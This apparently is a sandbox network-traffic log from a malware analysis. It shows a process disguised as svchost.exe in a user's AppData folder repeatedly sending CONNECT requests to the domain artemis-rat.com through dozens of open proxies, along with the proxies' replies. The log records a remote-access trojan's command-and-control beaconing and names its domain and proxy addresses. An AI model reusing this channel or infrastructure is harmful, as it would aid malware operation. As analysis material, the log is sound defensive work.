Mar 9, 2024 13:14:30.555453062 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2465	192.168.2.5	57996	93.190.141.102	47851	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.401704073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.694600105 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2466	192.168.2.5	57985	13.38.176.104	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.401724100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.698390007 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:30 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2467	192.168.2.5	57981	60.246.122.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.403413057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2468	192.168.2.5	58179	104.16.105.142	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.403413057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.558563948 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2469	192.168.2.5	57937	148.66.130.53	56350	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.403589010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2470	192.168.2.5	58192	172.67.181.129	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.403597116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.558613062 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2471	192.168.2.5	58039	184.181.217.194	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.403796911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2472	192.168.2.5	58211	172.67.181.107	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.403963089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.558725119 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2473	192.168.2.5	58178	162.214.225.223	48414	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.408086061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.880251884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.567991972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.677370071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.771322966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.880585909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2474	192.168.2.5	57988	85.214.118.98	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.409156084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.731313944 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.23.1 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2475	192.168.2.5	57914	119.3.215.41	8888	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.409171104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2476	192.168.2.5	57998	43.131.246.77	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.411971092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2477	192.168.2.5	58125	129.213.150.205	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.430181980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2478	192.168.2.5	58019	150.109.243.156	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.430538893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2479	192.168.2.5	58108	34.135.166.24	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.430546999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2480	192.168.2.5	57953	203.95.198.170	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.431595087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2481	192.168.2.5	58239	52.35.240.119	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.448332071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.639142036 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:30 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2482	192.168.2.5	58231	47.184.175.164	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.450593948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.942749023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.646213055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2483	192.168.2.5	58018	185.81.153.162	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.456830025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2484	192.168.2.5	58095	43.163.192.3	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.458607912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2485	192.168.2.5	58079	221.153.92.39	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.458722115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2486	192.168.2.5	57099	195.98.93.234	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.459112883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2487	192.168.2.5	58001	93.90.212.2	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.463044882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2488	192.168.2.5	58213	104.145.235.200	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.467017889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.688371897 CET	247	IN	HTTP/1.0 307 Temporary Redirect Server: squid/3.1.23 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 0 Location: http://check.unblock-us.com/?url=artemis-rat.com%3A443 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2489	192.168.2.5	57089	51.75.126.150	4228	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.467685938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2490	192.168.2.5	57938	116.199.168.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.473506927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2491	192.168.2.5	58297	172.67.38.96	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.502791882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.656886101 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2492	192.168.2.5	58070	51.83.140.70	8181	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.512089968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.845030069 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.2 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2493	192.168.2.5	58068	80.67.8.6	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.514889002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2494	192.168.2.5	58027	103.49.202.252	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.514964104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2495	192.168.2.5	58046	8.219.177.134	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.515427113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2496	192.168.2.5	58113	82.113.157.122	31280	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.515532970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2497	192.168.2.5	58099	45.120.178.197	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.517762899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2498	192.168.2.5	58126	217.69.121.141	5806	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.518068075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
